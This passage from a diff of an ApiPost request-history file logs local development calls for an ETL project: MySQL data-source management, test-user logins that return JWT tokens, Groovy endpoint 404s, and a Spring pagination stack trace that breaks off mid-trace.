数据源备注不能为空\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":18.0,\"minute\":46.0,\"second\":17.0,\"nano\":6.064133E8}}},{\"url\":\"http://localhost:8886/addMysqlDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"id\\\": 1,\\n \\\"dataSourceId\\\": 1,\\n \\\"dataSourceDescribe\\\": \\\"1\\\",\\n \\\"linkAddress\\\": \\\"1\\\",\\n \\\"userName\\\": \\\"1\\\",\\n \\\"password\\\": \\\"1\\\",\\n \\\"connectionPort\\\": 1,\\n \\\"connectionDatabaseName\\\": \\\"1\\\",\\n \\\"extraConfig\\\": \\\"1\\\",\\n \\\"status\\\": 1,\\n \\\"remark\\\": \\\"1\\\",\\n \\\"dataSourceType\\\": 1,\\n \\\"dataSourceTypeName\\\": \\\"1\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": null,\\n \\\"data\\\": \\\"添加成功\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":18.0,\"minute\":47.0,\"second\":13.0,\"nano\":6.552032E8}}}],\"/deleteMysqlDataSource\":[{\"url\":\"http://localhost:8886/deleteMysqlDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Long\",\"value\":\"1\"},{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": null,\\n \\\"data\\\": \\\"删除成功\\\"\\n}\",\"selectedItem\":\"DELETE\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":18.0,\"minute\":46.0,\"second\":44.0,\"nano\":4.888341E8}}}]}",
+ "ApiPost:METDOD_SEND_RECORD:etl-auth-server": "{\"/user/login\":[{\"url\":\"http://localhost:9092/user/login\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"username\\\": \\\"liz\\\",\\n \\\"password\\\": \\\"123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 0,\\n \\\"message\\\": \\\"success\\\",\\n \\\"data\\\": {\\n \\\"access_token\\\": \\\"eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxIiwiZXhwIjoxNzE5NDExMDc3LCJjcmVhdGVkIjoxNzE5NDA5Mjc3MjA1LCJ1c2VybmFtZSI6ImxpeiJ9.EENJntGwBIeQETsyqD4H7Frqi0ApyZjos7KWNeqdLr3qy9x4qooeOsqBavqbRuol5sfugcXj05kYiMMheR_uNA\\\",\\n \\\"expire_in\\\": 1800000,\\n \\\"refresh_token\\\": \\\"eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxIiwiZXhwIjoxNzE5NDEyODc3LCJjcmVhdGVkIjoxNzE5NDA5Mjc3Mzg2LCJ1c2VybmFtZSI6ImxpeiJ9.A1qD8Z-6vH94Uty9N5Pwh8mOApBy7W_fl14uiJ-q1Cywi9ZRJku2po8voWuMS9ZyM4rHsArEkXMpJLEz6uv0GA\\\"\\n }\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":26.0},\"time\":{\"hour\":21.0,\"minute\":41.0,\"second\":17.0,\"nano\":4.466583E8}}},{\"url\":\"http://localhost:9092/user/login\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"username\\\": \\\"rose\\\",\\n \\\"password\\\": \\\"123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 0,\\n \\\"message\\\": \\\"success\\\",\\n \\\"data\\\": {\\n \\\"access_token\\\": \\\"eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyIiwiZXhwIjoxNzE5NDExMDg5LCJjcmVhdGVkIjoxNzE5NDA5Mjg5MjYyLCJ1c2VybmFtZSI6InJvc2UifQ.eWcW4sUMPJd_Pn9kX75VJ0kFKiEQ9MAuD9h2rQG7jazq6ayJnvunpG_Uh6g9624LKCdlYAo_cG2ABogYWwRZRw\\\",\\n \\\"expire_in\\\": 1800000,\\n \\\"refresh_token\\\": \\\"eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyIiwiZXhwIjoxNzE5NDEyODg5LCJjcmVhdGVkIjoxNzE5NDA5Mjg5MjYyLCJ1c2VybmFtZSI6InJvc2UifQ.qe_hkyimIgdSpQQawURpohCJlkBiQfPWQi_5Aj-OptRmNIFjEQlaVtgQUBSll0xJA-EyY_1qmF4nPOcnfx_6-g\\\"\\n }\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":26.0},\"time\":{\"hour\":21.0,\"minute\":41.0,\"second\":29.0,\"nano\":2.671504E8}}},{\"url\":\"http://localhost:9092/user/login\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n\\n \\\"username\\\": \\\"liz\\\",\\n \\\"password\\\": \\\"123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 0,\\n \\\"message\\\": \\\"success\\\",\\n \\\"data\\\": {\\n \\\"access_token\\\": \\\"eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxIiwiZXhwIjoxNzE5NTg1NDUwLCJjcmVhdGVkIjoxNzE5NTgzNjUwNDUyLCJ1c2VybmFtZSI6ImxpeiJ9.las9vyzKNROCtOUYM9RZj_KMRY6ZdVmE40UqMQUptxxwPpuwpAy01fyXxI4MIyzy_RLxERSUn-TEOhSY6DmNjg\\\",\\n \\\"expire_in\\\": 1800000,\\n \\\"refresh_token\\\": \\\"eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxIiwiZXhwIjoxNzE5NTg3MjUwLCJjcmVhdGVkIjoxNzE5NTgzNjUwNjc2LCJ1c2VybmFtZSI6ImxpeiJ9.k1u__5XiY8RWLTMKtTh2x222ZnBLUkOoA-Sz8AnpRegCw75fizsubDF_7p8uMax4UfQwdaZZkQ4uWUaal5Ddag\\\"\\n }\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":28.0},\"time\":{\"hour\":22.0,\"minute\":7.0,\"second\":30.0,\"nano\":7.083221E8}}},{\"url\":\"http://localhost:9092/user/login\",\"header\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n\\n \\\"username\\\": \\\"rose\\\",\\n \\\"password\\\": \\\"123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 0,\\n \\\"message\\\": \\\"success\\\",\\n \\\"data\\\": {\\n \\\"access_token\\\": \\\"eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyIiwiZXhwIjoxNzE5NTg1NDU2LCJjcmVhdGVkIjoxNzE5NTgzNjU2MTUxLCJ1c2VybmFtZSI6InJvc2UifQ.ncyLVFMNPgrARpOGqqdGEeKxLii_2iq4no1DQL1x4QUhCSS1cI9kyLndZMpdaJYOXcWPMGvE21KdSxf-wGfVfQ\\\",\\n \\\"expire_in\\\": 1800000,\\n \\\"refresh_token\\\": \\\"eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyIiwiZXhwIjoxNzE5NTg3MjU2LCJjcmVhdGVkIjoxNzE5NTgzNjU2MTUxLCJ1c2VybmFtZSI6InJvc2UifQ.DsE3TXKVNaP1HTsyTc_8y5OXadhz1qcHPVKBsl0z_HVGxNLrNb99-28UGOPbW8rquRYsPL6MisTmGWVSmddeKw\\\"\\n }\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024,\"month\":6,\"day\":28},\"time\":{\"hour\":22,\"minute\":7,\"second\":36,\"nano\":156002700}}}]}",
+ "ApiPost:METDOD_SEND_RECORD:etl-groovy": "{\"/groovy/test\":[{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:9010/groovy/test\\n\\n\\u003c!doctype html\\u003e\\u003chtml lang\\u003d\\\"en\\\"\\u003e\\u003chead\\u003e\\u003ctitle\\u003eHTTP Status 404 – Not Found\\u003c/title\\u003e\\u003cstyle type\\u003d\\\"text/css\\\"\\u003ebody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}\\u003c/style\\u003e\\u003c/head\\u003e\\u003cbody\\u003e\\u003ch1\\u003eHTTP Status 404 – Not Found\\u003c/h1\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":26.0},\"time\":{\"hour\":16.0,\"minute\":55.0,\"second\":27.0,\"nano\":9.660242E8}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:9010/groovy/test\\n\\n\\u003c!doctype html\\u003e\\u003chtml lang\\u003d\\\"en\\\"\\u003e\\u003chead\\u003e\\u003ctitle\\u003eHTTP Status 404 – Not Found\\u003c/title\\u003e\\u003cstyle type\\u003d\\\"text/css\\\"\\u003ebody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}\\u003c/style\\u003e\\u003c/head\\u003e\\u003cbody\\u003e\\u003ch1\\u003eHTTP Status 404 – Not Found\\u003c/h1\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":26.0},\"time\":{\"hour\":16.0,\"minute\":55.0,\"second\":36.0,\"nano\":8.924439E8}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:9010/groovy/test\\n\\n\\u003c!doctype html\\u003e\\u003chtml lang\\u003d\\\"en\\\"\\u003e\\u003chead\\u003e\\u003ctitle\\u003eHTTP Status 404 – Not Found\\u003c/title\\u003e\\u003cstyle type\\u003d\\\"text/css\\\"\\u003ebody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}\\u003c/style\\u003e\\u003c/head\\u003e\\u003cbody\\u003e\\u003ch1\\u003eHTTP Status 404 – Not Found\\u003c/h1\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":26.0},\"time\":{\"hour\":16.0,\"minute\":56.0,\"second\":16.0,\"nano\":1.317896E8}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:9010/groovy/test\\n\\n\\u003c!doctype html\\u003e\\u003chtml lang\\u003d\\\"en\\\"\\u003e\\u003chead\\u003e\\u003ctitle\\u003eHTTP Status 404 – Not Found\\u003c/title\\u003e\\u003cstyle type\\u003d\\\"text/css\\\"\\u003ebody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}\\u003c/style\\u003e\\u003c/head\\u003e\\u003cbody\\u003e\\u003ch1\\u003eHTTP Status 404 – Not Found\\u003c/h1\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":28.0},\"time\":{\"hour\":22.0,\"minute\":7.0,\"second\":44.0,\"nano\":9.091907E8}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:9010/groovy/test\\n\\n\\u003c!doctype html\\u003e\\u003chtml lang\\u003d\\\"en\\\"\\u003e\\u003chead\\u003e\\u003ctitle\\u003eHTTP Status 404 – Not Found\\u003c/title\\u003e\\u003cstyle type\\u003d\\\"text/css\\\"\\u003ebody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}\\u003c/style\\u003e\\u003c/head\\u003e\\u003cbody\\u003e\\u003ch1\\u003eHTTP Status 404 – Not Found\\u003c/h1\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":29.0},\"time\":{\"hour\":13.0,\"minute\":56.0,\"second\":48.0,\"nano\":7.853691E8}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:9010/groovy/test\\n\\n\\u003c!doctype html\\u003e\\u003chtml lang\\u003d\\\"en\\\"\\u003e\\u003chead\\u003e\\u003ctitle\\u003eHTTP Status 404 – Not Found\\u003c/title\\u003e\\u003cstyle type\\u003d\\\"text/css\\\"\\u003ebody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}\\u003c/style\\u003e\\u003c/head\\u003e\\u003cbody\\u003e\\u003ch1\\u003eHTTP Status 404 – Not Found\\u003c/h1\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":29.0},\"time\":{\"hour\":13.0,\"minute\":56.0,\"second\":54.0,\"nano\":9.03339E7}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:9010/groovy/test\\n\\n\\u003c!doctype html\\u003e\\u003chtml lang\\u003d\\\"en\\\"\\u003e\\u003chead\\u003e\\u003ctitle\\u003eHTTP Status 404 – Not Found\\u003c/title\\u003e\\u003cstyle type\\u003d\\\"text/css\\\"\\u003ebody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}\\u003c/style\\u003e\\u003c/head\\u003e\\u003cbody\\u003e\\u003ch1\\u003eHTTP Status 404 – Not Found\\u003c/h1\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":29.0},\"time\":{\"hour\":13.0,\"minute\":57.0,\"second\":45.0,\"nano\":7.43563E8}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:9010/groovy/test\\n\\n\\u003c!doctype html\\u003e\\u003chtml lang\\u003d\\\"en\\\"\\u003e\\u003chead\\u003e\\u003ctitle\\u003eHTTP Status 404 – Not Found\\u003c/title\\u003e\\u003cstyle type\\u003d\\\"text/css\\\"\\u003ebody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}\\u003c/style\\u003e\\u003c/head\\u003e\\u003cbody\\u003e\\u003ch1\\u003eHTTP Status 404 – Not Found\\u003c/h1\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":29.0},\"time\":{\"hour\":14.0,\"minute\":8.0,\"second\":32.0,\"nano\":6.484462E8}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:9010/groovy/test\\n\\n\\u003c!doctype html\\u003e\\u003chtml lang\\u003d\\\"en\\\"\\u003e\\u003chead\\u003e\\u003ctitle\\u003eHTTP Status 404 – Not Found\\u003c/title\\u003e\\u003cstyle type\\u003d\\\"text/css\\\"\\u003ebody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}\\u003c/style\\u003e\\u003c/head\\u003e\\u003cbody\\u003e\\u003ch1\\u003eHTTP Status 404 – Not Found\\u003c/h1\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":30.0},\"time\":{\"hour\":9.0,\"minute\":13.0,\"second\":32.0,\"nano\":6.410368E8}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:9010/groovy/test\\n\\n\\u003c!doctype html\\u003e\\u003chtml lang\\u003d\\\"en\\\"\\u003e\\u003chead\\u003e\\u003ctitle\\u003eHTTP Status 404 – Not Found\\u003c/title\\u003e\\u003cstyle type\\u003d\\\"text/css\\\"\\u003ebody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}\\u003c/style\\u003e\\u003c/head\\u003e\\u003cbody\\u003e\\u003ch1\\u003eHTTP Status 404 – Not Found\\u003c/h1\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":30.0},\"time\":{\"hour\":9.0,\"minute\":21.0,\"second\":21.0,\"nano\":6.588192E8}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"通过方法获取的模拟静态变量\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":30.0},\"time\":{\"hour\":10.0,\"minute\":0.0,\"second\":34.0,\"nano\":9.980221E8}}},{\"url\":\"http://localhost:9010/groovy/test\",\"header\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"通过方法获取的模拟静态变量\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024,\"month\":6,\"day\":30},\"time\":{\"hour\":11,\"minute\":24,\"second\":1,\"nano\":764227900}}}]}",
+ "ApiPost:METDOD_SEND_RECORD:etl-heihei": "{\"/car\":[{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"carId\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":1.0,\"key\":\"sort.orders\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Array\",\"value\":\"\"},{\"is_checked\":1.0,\"key\":\"sort.orders.direction\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.Direction\",\"value\":\"ASC\"},{\"is_checked\":1.0,\"key\":\"sort.orders.property\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":1.0,\"key\":\"sort.orders.ignoreCase\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"boolean\",\"value\":\"false\"},{\"is_checked\":1.0,\"key\":\"sort.orders.nullHandling\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.NullHandling\",\"value\":\"NATIVE\"},{\"is_checked\":1.0,\"key\":\"page\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"size\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car?sort.orders.nullHandling\\u003dNATIVE\\u0026sort.orders\\u003d\\u0026sort.orders.direction\\u003dASC\\u0026size\\u003d1\\u0026id\\u003d1\\u0026page\\u003d1\\u0026sort.orders.property\\u003d\\u0026sort.orders.ignoreCase\\u003dfalse\\u0026carId\\u003d\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:16:20 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dInternal Server Error, status\\u003d500).\\u003c/div\\u003e\\u003cdiv\\u003eFailed to instantiate [org.springframework.data.domain.PageRequest]: Constructor threw exception; nested exception is java.lang.IllegalArgumentException: Sort must not be null\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.beans.BeanInstantiationException: Failed to instantiate [org.springframework.data.domain.PageRequest]: Constructor threw exception; nested exception is java.lang.IllegalArgumentException: Sort must not be null\\r\\n\\tat org.springframework.beans.BeanUtils.instantiateClass(BeanUtils.java:224)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:332)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat 